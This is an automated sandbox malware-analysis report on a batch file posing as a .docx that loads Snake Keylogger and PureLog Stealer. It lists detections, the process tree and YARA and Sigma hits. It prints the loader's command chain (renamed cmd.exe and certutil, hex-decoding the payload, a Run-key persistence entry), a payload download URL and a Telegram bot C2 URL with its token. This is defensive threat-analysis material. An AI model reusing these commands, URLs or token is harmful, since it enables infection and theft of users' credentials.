Windows Analysis Report
F.O Pump Istek,Docx.bat

Overview

General Information

Sample name: F.O Pump Istek,Docx.bat
Analysis ID: 1577663
MD5: 0bdc3aeffe000c9c0c73a3faa2d001d8
SHA1: 1c8bc96bd0e00b21d734f936aeaea1e612442912
SHA256: e11e4469c9c003f2b0074deada876e15f30afccae6178c5317e16cf5e6ee1ff6
Tags: bat, user-Racco42

Detection

DBatLoader, PureLog Stealer, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Registers a new ROOT certificate
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3344 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3456 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 3600 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 2948 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6968 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5584 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 4676 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5560 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • spoolsv.COM (PID: 4896 cmdline: C:\Users\Public\Libraries\spoolsv.COM MD5: 46FC1E1BCA07585CF21CC37149F2B424)
      • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xzeheenC.pif (PID: 6760 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
    • alpha.exe (PID: 4936 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 3848 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • Cneehezx.PIF (PID: 2844 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 46FC1E1BCA07585CF21CC37149F2B424)
    • cmd.exe (PID: 2288 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 3428 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cneehezx.PIF (PID: 5856 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 46FC1E1BCA07585CF21CC37149F2B424)
    • cmd.exe (PID: 2960 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 7064 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}
{"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
Source | Rule | Description | Author | Strings
00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2de8d:$a1: get_encryptedPassword
  • 0x661a5:$a1: get_encryptedPassword
  • 0x2de61:$a2: get_encryptedUsername
  • 0x66179:$a2: get_encryptedUsername
  • 0x2df25:$a3: get_timePasswordChanged
  • 0x6623d:$a3: get_timePasswordChanged
  • 0x2de3d:$a4: get_passwordField
  • 0x66155:$a4: get_passwordField
  • 0x2dea3:$a5: set_encryptedPassword
  • 0x661bb:$a5: set_encryptedPassword
  • 0x2dc70:$a7: get_logins
  • 0x65f88:$a7: get_logins
  • 0x2a3ae:$a10: KeyLoggerEventArgs
  • 0x626c6:$a10: KeyLoggerEventArgs
  • 0x2a37d:$a11: KeyLoggerEventArgsEventHandler
  • 0x62695:$a11: KeyLoggerEventArgsEventHandler
  • 0x2dd44:$a13: _encryptedPassword
  • 0x6605c:$a13: _encryptedPassword
00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Source | Rule | Description | Author | Strings
16.2.xzeheenC.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
22.2.xzeheenC.pif.33966478.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
22.2.xzeheenC.pif.33966478.4.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x26c15:$a1: get_encryptedPassword
  • 0x26be9:$a2: get_encryptedUsername
  • 0x26cad:$a3: get_timePasswordChanged
  • 0x26bc5:$a4: get_passwordField
  • 0x26c2b:$a5: set_encryptedPassword
  • 0x269f8:$a7: get_logins
  • 0x23136:$a10: KeyLoggerEventArgs
  • 0x23105:$a11: KeyLoggerEventArgsEventHandler
  • 0x26acc:$a13: _encryptedPassword
22.2.xzeheenC.pif.33966478.4.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
  • 0x2545d:$s1: UnHook
  • 0x253f9:$s2: SetHook
  • 0x25432:$s3: CallNextHook
  • 0x253c1:$s4: _hook
16.2.xzeheenC.pif.2b37c896.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

              System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3344, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 3600, ProcessName: alpha.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 3600, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 2948, ProcessName: extrac32.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 185.166.143.48, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\spoolsv.COM, Initiated: true, ProcessId: 4896, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49704
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xzeheenC.pif, NewProcessName: C:\Users\Public\Libraries\xzeheenC.pif, OriginalFileName: C:\Users\Public\Libraries\xzeheenC.pif, ParentCommandLine: C:\Users\Public\Libraries\spoolsv.COM, ParentImage: C:\Users\Public\Libraries\spoolsv.COM, ParentProcessId: 4896, ParentProcessName: spoolsv.COM, ProcessCommandLine: C:\Users\Public\Libraries\xzeheenC.pif, ProcessId: 6760, ProcessName: xzeheenC.pif
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T16:30:32.480752+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 185.166.143.48 | 443 | TCP
2024-12-18T16:30:34.912380+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 54.231.224.185 | 443 | TCP

              AV Detection

              Source: C:\Users\Public\Libraries\spoolsv.COM | Avira: detection malicious, Label: HEUR/AGEN.1326111
              Source: C:\Users\Public\Libraries\Cneehezx.PIF | Avira: detection malicious, Label: HEUR/AGEN.1326111
              Source: xzeheenC.pif.7064.26.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
              Source: spoolsv.COM.9.dr | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}
              Source: F.O Pump Istek,Docx.bat | ReversingLabs: Detection: 23%
              Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF792D2FF64
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D65F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF792D65F54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5F20 CryptDecodeObjectEx,7_2_00007FF792DF5F20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D260DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF792D260DA
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D64070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF792D64070
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF792DBE044
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D25DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF792D25DF7
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D01DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF792D01DE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D25DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF792D25DA1
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF792DA5D80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF792D4DD80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D73D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF792D73D60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D49D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D49D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF792DF5D74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D51D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF792D51D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCBD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF792DCBD3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF792DC7D3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DADD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF792DADD1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF792DBFD2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D85F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF792D85F04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D47F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF792D47F14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF792DC7EE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF792D4DEA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D7DEB0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF792DBDE70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF792DF5E3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D81E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF792D81E2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF792DC8404
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D14410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D14410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D323E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF792D323E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF792D1E3B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF792D82358
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D86374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF792D86374
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DBE516
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D044E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D044E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF792D1C514
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D624D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF792D624D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D88488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF792D88488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF792D6A450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF792D6C450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF792D8E1F8
